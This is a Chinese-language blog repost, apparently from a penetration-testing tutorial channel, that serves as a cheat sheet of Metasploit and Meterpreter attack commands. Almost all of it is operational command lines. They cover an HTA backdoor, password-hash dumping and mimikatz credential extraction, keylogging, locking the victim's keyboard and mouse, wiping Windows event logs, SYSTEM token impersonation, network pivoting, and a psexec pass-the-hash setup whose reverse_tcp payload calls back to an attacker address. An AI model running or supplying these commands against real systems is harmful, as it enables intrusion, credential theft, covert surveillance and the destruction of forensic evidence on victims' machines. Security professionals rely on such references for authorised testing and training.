Metasploit常用命令整理

admin 2020年10月10日12:21:50评论438 views字数 3006阅读10分1秒阅读模式

    日常发生的多数事情原本不带色彩。我们如何表达,便有了各自的世界 

先放点我实战的经验😁

use exploit/windows/misc/hta_server # 一句话hat后门


# 防止假session

有时会遇到假session或者刚连接就断开的情况

set ExitOnSession false


chcp 65001 # 解决shell乱码


run post/windows/gather/enum_chrome  #获取Chrome缓存

基本系统命令

sessions -i <ID值>  #进入会话   -k  杀死会话

background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell

enumdesktops  #查看可用的桌面

getdesktop    #获取当前meterpreter 关联的桌面

set_desktop   #设置meterpreter关联的桌面  -h查看帮助

screenshot  #截屏

run vnc  #使用vnc远程桌面连接

clearev  #清除windows中的应用程序日志、系统日志、安全日志

常用模块

run post/windows/gather/smart_hashdump  #从SAM导出密码哈希(需要SYSTEM权限)

run post/windows/gather/enum_patches  #查看补丁信息

run post/windows/gather/checkvm #是否虚拟机

run post/linux/gather/checkvm #是否虚拟机

run post/windows/gather/forensics/enum_drives #查看分区

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks   #获取最近的文件操作

run post/windows/gather/enum_ie  #获取IE缓存

run post/windows/gather/enum_chrome   #获取Chrome缓存

run post/windows/gather/enum_patches  #补丁信息

run post/windows/gather/enum_domain  #查找域控


基本文件系统命令

getwd 或者pwd # 查看当前工作目录  
search -f *pass*       # 搜索文件  -h查看帮助
cat c:\bzhack\lpasswd.txt  # 查看文件内容
upload /tmp/hack.txt C:\bzhack  # 上传文件到目标机上
download c:\bzhack\passwd.txt /tmp/ # 下载文件到本机上
edit c:\1.txt #编辑或创建文件  没有的话,会新建文件
rm C:\bzhack\hack.txt
mkdir bzhack2  #只能在当前目录下创建文件夹
rmdir bzhack2  #只能删除当前目录下文件夹
getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
lcd /tmp   #操作攻击者主机 切换目录    


摄像头

uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘    

execute执行文件

execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

migrate进程迁移

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
kill <pid值>   #杀死进程    

基本网络命令

ipconfig/ifconfig
netstat –ano
arp
getproxy   #查看代理信息
route   #查看路由

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
portfwd delete -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口删除

autoroute添加路由

run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

Socks4a代理

msf> use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run


uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘 


keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录   

mimikatz

load mimikatz    #help mimikatz 查看帮助

load kiwi

wdigest  #获取Wdigest密码

mimikatz_command -f samdump::hashes  #执行mimikatz原始命令

mimikatz_command -f sekurlsa::searchPasswords

kerberos #管理员在线或者没有注销下获取明文

incognito假冒令牌

use incognito      #help incognito  查看帮助

list_tokens -u    #查看可用的token

impersonate_token 'NT AUTHORITYSYSTEM'  #假冒SYSTEM token

或者impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\

execute -f cmd.exe -i –t    # -t 使用假冒的token 执行

或者直接shell

rev2self   #返回原始token

PSExec哈希传递

msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 443
msf > set RHOST 192.168.159.144
msf >set SMBUser Administrator
msf >set SMBPass aad3b4*****04ee:5b5f00*****c424c
msf >set SMBDomain  WORKGROUP   #域用户需要设置SMBDomain
msf >exploit

渗透测试教程

分享渗透测试、黑客入门

长按或扫码关注

Metasploit常用命令整理

本文始发于微信公众号(渗透测试教程):Metasploit常用命令整理

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月10日12:21:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit常用命令整理http://cn-sec.com/archives/153872.html

发表评论

匿名网友 填写信息